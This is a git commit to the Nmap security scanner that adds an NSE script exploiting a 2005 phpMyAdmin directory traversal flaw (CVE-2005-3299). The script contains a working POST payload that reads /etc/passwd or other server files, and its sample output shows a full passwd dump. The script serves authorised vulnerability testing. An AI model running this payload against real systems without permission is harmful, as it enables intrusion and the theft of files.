Add http-phpmyadmin-dir-traversal by Alexey Meshcheryakov.

http://seclists.org/nmap-dev/2013/q1/372
2025-12-06 04:31:29 +00:00 · 2013-05-31 19:59:30 +00:00
parent 5757bfb11b
commit 8be62726e5
3 changed files with 144 additions and 0 deletions
--- a/2
+++ b/2
@@ -1,5 +1,7 @@
 # Nmap Changelog ($Id$); -*-text-*-

+o [NSE] Added http-phpmyadmin-dir-traversal by Alexey Meshcheryakov.
+
 o Added a service probe for Erlang distribution nodes.
  [Michael Schierl]

--- a/scripts/http-phpmyadmin-dir-traversal.nse
+++ b/scripts/http-phpmyadmin-dir-traversal.nse
@@ -0,0 +1,141 @@
+local shortport = require "shortport"
+local stdnse = require "stdnse"
+local http = require "http"
+local vulns = require "vulns"
+
+description = [[
+Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 to retrieve remote files on the web server. Other phpmyadmin versions might be vulnerable.
+
+Reference:
+* http://www.exploit-db.com/exploits/1244/
+]]
+
+---
+-- @usage
+-- nmap -p80 --script http-phpmyadmin-dir-traversal --script-args="dir='/pma/',file='../../../../../../../../etc/passwd',outfile='passwd.txt'" <host/ip>
+-- nmap -p80 --script http-phpmyadmin-dir-traversal <host/ip>
+--
+-- @args http-phpmyadmin-dir-traversal.file Remote file to retrieve. Default: <code>../../../../../etc/passwd</code>
+-- @args http-phpmyadmin-dir-traversal.outfile Output file
+-- @args http-phpmyadmin-dir-traversal.dir Basepath to the services page. Default: <code>/phpMyAdmin-2.6.4-pl1/</code>
+--
+-- Other useful arguments for this script:
+-- @args http.useragent User Agent used in the GET requests
+---
+-- @output
+-- PORT   STATE SERVICE
+-- 80/tcp open  http
+-- | http-phpmyadmin-dir-traversal:
+-- |   VULNERABLE:
+-- |   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
+-- |     State: VULNERABLE (Exploitable)
+-- |     IDs:  CVE:CVE-2005-3299
+-- |     Description:
+-- |       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
+-- |
+-- |     Disclosure date: 2005-10-nil
+-- |     Extra information:
+-- |       ../../../../../../../../etc/passwd :
+-- |   root:x:0:0:root:/root:/bin/bash
+-- |   daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+-- |   bin:x:2:2:bin:/bin:/bin/sh
+-- |   sys:x:3:3:sys:/dev:/bin/sh
+-- |   sync:x:4:65534:sync:/bin:/bin/sync
+-- |   games:x:5:60:games:/usr/games:/bin/sh
+-- |   man:x:6:12:man:/var/cache/man:/bin/sh
+-- |   lp:x:7:7:lp:/var/spool/lpd:/bin/sh
+-- |   mail:x:8:8:mail:/var/mail:/bin/sh
+-- |   news:x:9:9:news:/var/spool/news:/bin/sh
+-- |   uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
+-- |   proxy:x:13:13:proxy:/bin:/bin/sh
+-- |   www-data:x:33:33:www-data:/var/www:/bin/sh
+-- |   backup:x:34:34:backup:/var/backups:/bin/sh
+-- |   list:x:38:38:Mailing List Manager:/var/list:/bin/sh
+-- |   irc:x:39:39:ircd:/var/run/ircd:/bin/sh
+-- |   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
+-- |   nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
+-- |   libuuid:x:100:101::/var/lib/libuuid:/bin/sh
+-- |   syslog:x:101:103::/home/syslog:/bin/false
+-- |   sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
+-- |   dps:x:1000:1000:dps,,,:/home/dps:/bin/bash
+-- |   vboxadd:x:999:1::/var/run/vboxadd:/bin/false
+-- |   mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false
+-- |   memcache:x:104:112:Memcached,,,:/nonexistent:/bin/false
+-- |   ../../../../../../../../etc/passwd saved to passwd.txt
+-- |
+-- |     References:
+-- |       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
+-- |_      http://www.exploit-db.com/exploits/1244/
+author = "Alexey Meshcheryakov"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"vuln", "exploit"}
+
+portrule = shortport.http
+
+---
+--Writes string to file
+--Taken from: hostmap.nse
+local function write_file(filename, contents)
+  local f, err = io.open(filename, "w")
+  if not f then
+    return f, err
+  end
+  f:write(contents)
+  f:close()
+  return true
+end
+
+--Default configuration values
+local EXPLOIT_QUERY = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=%s&subform[1][cXIb8O3]=1"
+local DEFAULT_FILE = "../../../../../etc/passwd"
+local DEFAULT_DIR = "/phpMyAdmin-2.6.4-pl1/"
+local EXPLOIT_PATH = "libraries/grab_globals.lib.php"
+
+action = function(host, port)
+	local response, dir, file
+	dir = stdnse.get_script_args("http-phpmyadmin-dir-traversal.dir") or DEFAULT_DIR
+	evil_uri = dir..EXPLOIT_PATH
+	rfile = stdnse.get_script_args("http-phpmyadmin-dir-traversal.file") or DEFAULT_FILE
+	evil_postdata = EXPLOIT_QUERY:format(rfile)
+	filewrite = stdnse.get_script_args(SCRIPT_NAME..".outfile")
+	stdnse.print_debug(1, "%s: HTTP POST %s%s", SCRIPT_NAME, stdnse.get_hostname(host), evil_uri)
+	stdnse.print_debug(1, "%s: POST DATA %s", SCRIPT_NAME, evil_postdata)
+
+	local vuln = {
+		title = 'phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion',
+		IDS = {CVE = 'CVE-2005-3299'},
+		state = vulns.STATE.NOT_VULN,
+		description = 
+			[[PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
+		]],
+		references = {
+			'http://www.exploit-db.com/exploits/1244/',
+		},
+		dates = {
+			disclosure = {year = '2005', month = '10', dat = '10'},
+		},
+	}
+	local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+	
+	response = http.post(host, port, evil_uri, 
+		{header = {["Content-Type"] = "application/x-www-form-urlencoded"}}, nil, evil_postdata)
+	if response.body and response.status==200 then
+		stdnse.print_debug(1, "%s: response : %s", SCRIPT_NAME, response.body)
+		vuln.state = vulns.STATE.EXPLOIT
+		vuln.extra_info = rfile.." :\n"..response.body
+		if filewrite then
+			local status, err = write_file(filewrite,  response.body)
+			if status then
+				vuln.extra_info = string.format("%s%s saved to %s\n", vuln.extra_info, rfile, filewrite)
+			else
+				vuln.extra_info = string.format("%sError saving %s to %s: %s\n", vuln.extra_info, rfile, filewrite, err)
+			end
+		end
+	elseif response.status==500 then
+		vuln.state = vulns.STATE.LIKELY_VULN
+		stdnse.print_debug(1, "%s:[Error] File not found:%s", SCRIPT_NAME, rfile)
+		stdnse.print_debug(1, "%s: response : %s", SCRIPT_NAME, response.body)
+		vuln.extra_info = string.format("%s not found.\n", rfile)
+	end
+	return vuln_report:make_output(vuln)
+end
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -175,6 +175,7 @@ Entry { filename = "http-open-proxy.nse", categories = { "default", "discovery",
 Entry { filename = "http-open-redirect.nse", categories = { "discovery", "intrusive", } }
 Entry { filename = "http-passwd.nse", categories = { "intrusive", "vuln", } }
 Entry { filename = "http-php-version.nse", categories = { "discovery", "safe", } }
+Entry { filename = "http-phpmyadmin-dir-traversal.nse", categories = { "exploit", "vuln", } }
 Entry { filename = "http-phpself-xss.nse", categories = { "fuzzer", "intrusive", "vuln", } }
 Entry { filename = "http-proxy-brute.nse", categories = { "brute", "external", "intrusive", } }
 Entry { filename = "http-put.nse", categories = { "discovery", "intrusive", } }